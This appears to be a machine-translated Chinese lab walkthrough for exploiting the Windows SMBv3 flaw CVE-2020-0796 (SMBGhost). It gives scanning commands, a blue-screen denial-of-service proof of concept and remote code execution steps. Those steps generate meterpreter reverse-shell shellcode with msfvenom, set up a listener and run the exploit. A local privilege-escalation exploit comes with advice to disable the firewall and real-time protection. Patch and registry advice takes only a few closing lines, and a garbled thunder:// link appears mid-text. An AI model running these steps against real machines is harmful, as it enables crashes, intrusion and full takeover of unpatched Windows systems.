table of Contents
Vulnerability description
There is a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol processes certain requests, also known as the "Windows SMBv3 client/server remote code execution vulnerability".
Impact version
- Windows 10 version 1903 for 32-bit systems
- Windows 10 version 1903 (for ARM64-based systems)
- Windows 10 version 1903 (for x64-based systems)
- Windows 10 version 1909 for 32-bit systems
- Windows 10 version 1909 (for ARM64-based systems)
- Windows 10 version 1909 (for x64-based systems)
- Windows Server version 1903 (Server Core installation)
- Windows Server version 1909 (Server Core installation)
Vulnerability detection
Use tool:
https://github.com/GuoKerS/aioScan_CVE-2020-0796
Instructions:
#安装python模块
python3 -m pip install netaddr
#脚本利用 python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137
Prompt Vulnerable!!
that there is a vulnerability
Exploit
Windows 10 version 1903 (for x64-based systems) Thunder download address:
thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8v
Blue screen attack
Use tool:
https://github.com/eerykitty/CVE-2020-0796-PoC
Use tutorial:
#进入下载好的脚本目录,安装python模块
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography
#脚本利用
#python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137
Remote code execution
Python version: 3.6.6
requires python3.6 version. After 3.7 executes the script, it will blue screen and cannot execute remote commands.
Download link: https://www.python.org/downloads/release/python-366/
Use tool:
https://github.com/chompie1337/SMBGhost_RCE_PoC
After downloading the tool, first generate the shellcode of the reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt
Copy shellcode.txt
the shell in and replace buf with USER_PAYLOAD
小技巧,windows的文本工具可以替换字符
Copy the changed shellcode to the script exploit.py
file we downloaded , replace USER_PAYLOAD
kali and enable msf monitoring:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
Script exp exploit attack:
python36 exploit.py -ip 192.168.206.141
When the execution is displayed [+] Press a key to execute shellcode!
,
press Enter msf to obtain shell permissions:
shell
Local escalation
Download using attack:
https://github.com/danigargu/CVE-2020-0796
Need to generate exe, generate exe need to use Visual Studio
After downloading, open Visual Studio, load the project, and open the CVE-2020-0796.sln file . After the
exe is
generated, there will be a \x64\Debug\
folder in your exp directory
To copy the exe file to windows10, you need to turn off the firewall and turn off the real-time protection.
Script utilization:
exe can be run directly
Repair suggestions
- Update windows or install patches in time: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
- Running
regedit.exe
, open the registry editor,HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameters
create a file calledDisableCompression
inDWORD
, is1
prohibited SMB compression feature.